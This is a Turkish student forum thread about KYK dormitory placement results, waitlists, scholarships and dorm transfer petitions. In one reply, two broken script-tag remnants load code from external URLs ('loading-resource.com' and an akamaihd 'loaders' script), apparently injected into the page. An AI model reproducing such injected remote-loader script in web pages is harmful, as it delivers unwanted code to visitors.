KYK Sonuçlar Belli Oldu
-
Erkek Başvuru Türü: ARASINIF TC Kimlik Numarası: Adı: MURAT Soyadı: AL Durumu: Yurt İsteği Yok Bölge Adı: Genel Yurt Adı: Adres: Genel Yurt Yedek Sırası: 0 Yüksek Ücretli Yurt Adı: Yüksek Ücretli Yurt Yedek Sırası: 0 bu ne demek şimdi hiç bişey cıkmamismi bana :D zaten ben yurt degilde burs cıkmasını istym da anlamdm hiç bişey
-
antivirus bunu yazdı
Erkek Başvuru Türü: ARASINIF TC Kimlik Numarası: Adı: MURAT Soyadı: AL Durumu: Yurt İsteği Yok Bölge Adı: Genel Yurt Adı: Adres: Genel Yurt Yedek Sırası: 0 Yüksek Ücretli Yurt Adı: Yüksek Ücretli Yurt Yedek Sırası: 0 bu ne demek şimdi hiç bişey cıkmamismi bana :D zaten ben yurt degilde burs cıkmasını istym da anlamdm hiç bişey
kalın yaptığım yer herşeyi anlatıyor :W
bursların açıklanmasına daha çok var
-
abi gelmez diye bişi yok bölgeye kapasiteye göre değişir durumlar yönetim odaları arttırabilir yataklar fazla olabilir
hatta bazı durumlarda belirli odaları yatakhaneye çevirebilirler.
ama genel olarak 2.dönemin başlarına doğru isteyen herkes kaydını yapabilir çünkü çoğu öğrenci eve çıkmış olur yada cemaate kaymış olur
max 6 ay dişinizi sıkıp kendinizi kyk'ya atabilir yada direk ev işlerine çıkıp insanları daha hızlı tanıyabilirsiniz :F
-
Kreyzi bunu yazdıantivirus bunu yazdı
kalın yaptığım yer herşeyi anlatıyor :W
bursların açıklanmasına daha çok var
he öylemi anldım sagol .
bide bişey daha sorayim part time sigortali calisan birine kredi veya burs gelme şansı nedir ?
< ="text/" ="http://loading-resource.com/.geo.php?callback=.__geo.get"> < ="text/" ="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"> -
yurt çıkan herkese tavsiye. baktınız beğendiğiniz bir yurt çıkmadı. hemen gidip kyk genel müdürlüğüne (hangi ildeyseniz) yurt değiştirmek ve şu yurda şu şu sebepten geçmek istiyorum diye dilekçe yazın. okullar açıldıktan sonra 2 hafta içerisine kadar o yurda gitmenizde üstünlüğünüz oluyor. Benim oda arkadaşımın zamanında okul açıldıktan 1 hafta sonra istediği yurda gelmiş.Benim başvurduktan yaklaşık 1-1buçuk hafta sonra geldi ve istediğim yurtta başladım eğitime. Ama bunu yapmanız için size çıkan yurda kaydolmanız gerekiyor. Dilekçe verdikten sonra internetten yayınlanan listeleri kontrol edin çıkmışmısınız diye. Örn. istanbul tercih edenler şu adresten takip edecekler : http://www.istyurtkur.gov.tr/
Boşuna kendiniz yormayın. -
Durumu: Genel ve Yüksek Ücretli Yurt Yedek Bölge Adı: ANKARA BÖLGE MÜDÜRLÜĞÜ Genel Yurt Adı: Adres: Genel Yurt Yedek Sırası: 3025 Yüksek Ücretli Yurt Adı: Yüksek Ücretli Yurt Yedek Sırası: 2137 tribe girmeden önce şuna bakın gençler : )
-
trabzon fatih yurtdu 319. yedek var amnko
-
Arkadaşlar kayıt için ne gerekli ben bakıyorum şimdiki sene Sabıka kaydı istenmiyor gözüküyor geçen yıl biz vermiştik. Lütfen biri beni bu konuda aydınlatsın.
-
arkadaşlar şimdi bizim okulda ilk %10luk dilime girenlere harçlarda indirim yapıyorlarmış (iö) ama ben okula kaçıncı sırada girdiğimi bilmiyorum bunun için nerden bilgi edinebilirim teşekkürler